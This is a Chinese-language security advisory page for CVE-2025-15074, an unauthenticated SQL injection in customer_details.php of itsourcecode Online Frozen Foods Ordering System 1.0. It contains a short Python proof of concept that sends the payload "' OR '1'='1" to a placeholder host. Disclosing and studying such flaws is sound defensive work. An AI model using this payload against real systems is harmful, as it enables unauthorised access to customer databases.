IPBUF安全漏洞报告

English

CVE-2025-15074 CVSS 7.3 高危

CVE-2025-15074: itsourcecode Online Frozen Foods Ordering System 1.0 SQL注入漏洞

披露日期: 2025-12-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15074

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Frozen Foods Ordering System 1.0

漏洞概述

该漏洞源于customer_details.php文件中的输入验证缺陷，攻击者可通过构造恶意SQL查询语句获取未授权访问权限。系统缺乏充分的参数过滤机制，使得攻击者能够执行任意SQL命令。

技术细节

攻击者利用SQL注入漏洞，通过在HTTP请求中注入SQL语句，可绕过认证机制并获取数据库敏感信息。漏洞存在于用户输入处理环节，未使用参数化查询或输入过滤。

攻击链分析

STEP 1

步骤1

识别目标系统及其版本信息

STEP 2

步骤2

在customer_details.php中构造恶意SQL注入载荷

STEP 3

步骤3

通过HTTP请求向目标系统发送注入载荷

STEP 4

步骤4

利用返回的数据库响应获取敏感信息或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

python
import requests

target_url = 'http://target.com/customer_details.php'
payload = "' OR '1'='1"
params = {'id': payload}
response = requests.get(target_url, params=params)
print(response.text)

影响范围

itsourcecode Online Frozen Foods Ordering System 1.0

防御指南

临时缓解措施

立即应用官方安全补丁或升级到修复版本

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15074
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15074
3 Details https://www.cvedetails.com/cve/CVE-2025-15074/
4 VulDB https://vuldb.com/cve/CVE-2025-15074
5 Link https://github.com/ttting888/CVE/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.338331
8 Link https://vuldb.com/?id.338331
9 Link https://vuldb.com/?submit.721389

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表